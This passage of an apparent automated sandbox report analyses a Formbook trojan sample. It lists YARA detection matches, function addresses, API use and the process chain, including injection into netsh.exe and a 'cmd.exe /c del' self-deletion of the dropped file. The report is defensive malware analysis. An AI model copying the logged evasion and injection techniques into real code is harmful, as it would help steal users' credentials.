                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D659108_2_03D65910
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD38E08_2_03CD38E0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D3D8008_2_03D3D800
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03C93FD28_2_03C93FD2
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03C93FD58_2_03C93FD5
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD1F928_2_03CD1F92
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8FFB18_2_03D8FFB1
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8FF098_2_03D8FF09
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD9EB08_2_03CD9EB0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CEFDC08_2_03CEFDC0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D81D5A8_2_03D81D5A
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD3D408_2_03CD3D40
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D87D738_2_03D87D73
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8FCF28_2_03D8FCF2
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D49C328_2_03D49C32
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CE1AD8_2_030CE1AD
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CD78F8_2_030CD78F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CE8918_2_030CE891
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030B2FB08_2_030B2FB0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030B9E5B8_2_030B9E5B
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030B9E608_2_030B9E60
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030B2D878_2_030B2D87
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030B2D908_2_030B2D90
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADA0368_2_03ADA036
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD5B308_2_03AD5B30
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD5B328_2_03AD5B32
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADB2328_2_03ADB232
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD89128_2_03AD8912
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD10828_2_03AD1082
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADE5CD8_2_03ADE5CD
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD2D028_2_03AD2D02
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 011BEA12 appears 86 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 01197E54 appears 111 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 0113B970 appears 280 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 011CF290 appears 105 times
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: String function: 01185130 appears 58 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D17E54 appears 111 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03CBB970 appears 280 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D4F290 appears 105 times
                Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03D05130 appears 58 times
                Source: hOe2JrpIAE.exeStatic PE information: invalid certificate
                Source: hOe2JrpIAE.exe, 00000000.00000002.2007654678.0000000007420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000000.00000002.2004466042.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000000.00000000.1983396250.0000000000BA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXUhH.exeX vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000006.00000002.2052100186.000000000147C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exe, 00000006.00000002.2051357395.000000000123D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exeBinary or memory string: OriginalFilenameXUhH.exeX vs hOe2JrpIAE.exe
                Source: hOe2JrpIAE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000007.00000002.4452293523.000000000E4F2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: hOe2JrpIAE.exe PID: 4952, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: hOe2JrpIAE.exe PID: 2796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: netsh.exe PID: 5712, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: hOe2JrpIAE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, jLW4CR6YqLFnTWAfMo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, jLW4CR6YqLFnTWAfMo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, jLW4CR6YqLFnTWAfMo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.evad.winEXE@14/1@12/5
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01087F40 DisplayMessageM,FormatMessageW,GetLastError,GetStdHandle,LocalFree,8_2_01087F40
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01088D48 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysAllocString,SysAllocString,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,8_2_01088D48
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hOe2JrpIAE.exe.logJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                Source: hOe2JrpIAE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: hOe2JrpIAE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: hOe2JrpIAE.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
                Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: hOe2JrpIAE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: hOe2JrpIAE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: hOe2JrpIAE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: XUhH.pdb source: hOe2JrpIAE.exe
                Source: Binary string: XUhH.pdbSHA256 source: hOe2JrpIAE.exe
                Source: Binary string: netsh.pdb source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: netsh.pdbGCTL source: hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2050799849.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, hOe2JrpIAE.exe, 00000006.00000002.2052100186.0000000001460000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4441556154.0000000001080000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: hOe2JrpIAE.exe, hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
